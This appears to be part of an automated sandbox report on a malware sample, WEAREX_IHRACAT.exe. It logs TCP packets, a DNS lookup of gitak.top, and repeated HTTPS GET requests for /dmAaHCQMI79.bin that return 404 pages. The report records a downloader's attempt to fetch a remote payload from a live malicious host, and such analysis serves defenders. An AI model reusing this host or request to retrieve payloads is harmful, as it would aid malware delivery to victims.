                        Aug 29, 2024 12:46:36.625814915 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:36.848781109 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:36.849014044 CEST49812443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:36.849493980 CEST49812443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:36.849507093 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:36.849591017 CEST49812443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:36.849601984 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:37.342232943 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:37.342437029 CEST49812443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:37.342503071 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:37.342654943 CEST49812443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:37.342714071 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:37.342900991 CEST49812443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:37.342948914 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:37.343170881 CEST49812443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:37.343208075 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:37.343314886 CEST49812443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:37.343389988 CEST49812443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:37.343434095 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:37.343463898 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:37.548295021 CEST44349812172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:37.548580885 CEST49812443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.372956038 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.373085976 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.373313904 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.373552084 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.373634100 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.592196941 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.592394114 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.592695951 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.592714071 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.592829943 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.592845917 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.848311901 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.848546028 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.848599911 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.848887920 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.850058079 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.850256920 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.850297928 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.850476027 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.850521088 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.850550890 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:47.850714922 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.850775003 CEST49813443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:47.850824118 CEST44349813172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:57.901814938 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:57.901943922 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:57.902189970 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:57.903110981 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:57.903187037 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.123657942 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.123899937 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:58.124186993 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:58.124232054 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.124273062 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:58.124301910 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.386090994 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.386282921 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:58.386321068 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.386348009 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.386487007 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:58.386528015 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.386698961 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:58.386738062 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.386888027 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:58.386920929 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.387068987 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:58.387092113 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.387135029 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:58.387171030 CEST44349814172.67.207.219192.168.11.20
                        Aug 29, 2024 12:46:58.387242079 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:46:58.387305021 CEST49814443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.399493933 CEST49815443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.399588108 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:08.399828911 CEST49815443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.400038958 CEST49815443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.400095940 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:08.622922897 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:08.623418093 CEST49815443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.623728991 CEST49815443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.623738050 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:08.623801947 CEST49815443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.623810053 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:08.891742945 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:08.891880989 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:08.891916037 CEST49815443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.891927004 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:08.892046928 CEST49815443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.892060995 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:08.892092943 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:08.892187119 CEST49815443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.892256021 CEST49815443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:08.892266035 CEST44349815172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:18.928551912 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:18.928672075 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:18.928926945 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:18.929094076 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:18.929151058 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.150279045 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.150533915 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:19.150803089 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:19.150834084 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.150887012 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:19.150906086 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.408679008 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.408840895 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:19.408915043 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.409084082 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:19.409100056 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.409133911 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.409300089 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:19.409348011 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.409456968 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:19.409488916 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.409535885 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.409603119 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:19.409648895 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:19.409677029 CEST44349816172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:19.409740925 CEST49816443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.488555908 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.488667965 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.488924980 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.489124060 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.489186049 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.715075016 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.715364933 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.715671062 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.715722084 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.715744972 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.715769053 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980079889 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980321884 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.980417967 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980582952 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.980622053 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980659962 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980859041 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.980906010 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980954885 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.981025934 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.981112957 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.981180906 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.064666033 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.064769983 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.064963102 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.065227032 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.065289974 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.286212921 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.286431074 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.286741018 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.286794901 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.286827087 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.286850929 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.545794964 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546044111 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546104908 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546139956 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546278954 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546336889 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546387911 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546535969 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546622992 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546741962 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546775103 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546803951 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546900034 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.547034979 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.547074080 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.624530077 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.624655008 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:50.624865055 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.625030041 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.625073910 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:50.857280970 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:50.857425928 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.857775927 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.857803106 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:50.857872009 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.857888937 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:51.113825083 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:51.113893032 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:51.113938093 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:51.114001989 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:51.114052057 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:51.114275932 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:51.114275932 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:51.114660025 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:51.114674091 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.153462887 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.153482914 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.153681040 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.153919935 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.153930902 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.368108988 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.368365049 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.368993044 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.369003057 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.369113922 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.369123936 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.626879930 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627010107 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627059937 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627068996 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.627083063 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627182961 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.627263069 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.627271891 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627296925 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627378941 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.627484083 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.627496958 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:11.666954994 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.666976929 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:11.667110920 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.667321920 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.667332888 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:11.882405996 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:11.882591963 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.882884026 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.882891893 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:11.882967949 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.882975101 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140532970 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140585899 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140661955 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140696049 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:12.140733957 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140743971 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:12.140772104 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140891075 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:12.141032934 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:12.141045094 CEST44349821172.67.207.219192.168.11.20

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Aug 29, 2024 12:40:17.157623053 CEST5779153192.168.11.201.1.1.1
                        Aug 29, 2024 12:40:17.539810896 CEST53577911.1.1.1192.168.11.20

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Aug 29, 2024 12:40:17.157623053 CEST192.168.11.201.1.1.10x9d5fStandard query (0)gitak.topA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Aug 29, 2024 12:40:17.539810896 CEST1.1.1.1192.168.11.200x9d5fNo error (0)gitak.top172.67.207.219A (IP address)IN (0x0001)false
                        Aug 29, 2024 12:40:17.539810896 CEST1.1.1.1192.168.11.200x9d5fNo error (0)gitak.top104.21.22.240A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • gitak.top

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.11.2049776172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:40:17 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:40:18 UTC667INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:40:18 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: MISS
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RtkS5n2C9K8mjiAQPIkIP9T88mXoVLDUFQwJUfSU5sWwsYGnJKDIxQnhTK%2BYG5ngpEcRf5RfEbq4xB%2BvWG1QUI17VL2JbGYWyhEsdLzTqLMGDmjiPOeBBprfnY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babec105a2956ec-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:40:18 UTC702INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:40:18 UTC1369INData Raw: 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 69 6e
                        Data Ascii: -top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.in
                        2024-08-29 10:40:18 UTC902INData Raw: 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e
                        Data Ascii: 715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.
                        2024-08-29 10:40:18 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.11.2049777172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:40:28 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:40:28 UTC675INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:40:28 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 10
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLabE8DPPtKS9rn%2FTmLbROV6pDDQFvRUk5aR5YeVnvTApARwxz%2F8eMLXqLjU1H2LPDuTGQXlPnvkwrSU8v3J6RPJcu5I7EI7q06db33Ur7Nef7zicxytRomCyHM%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babec535dbf2d28-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:40:28 UTC694INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
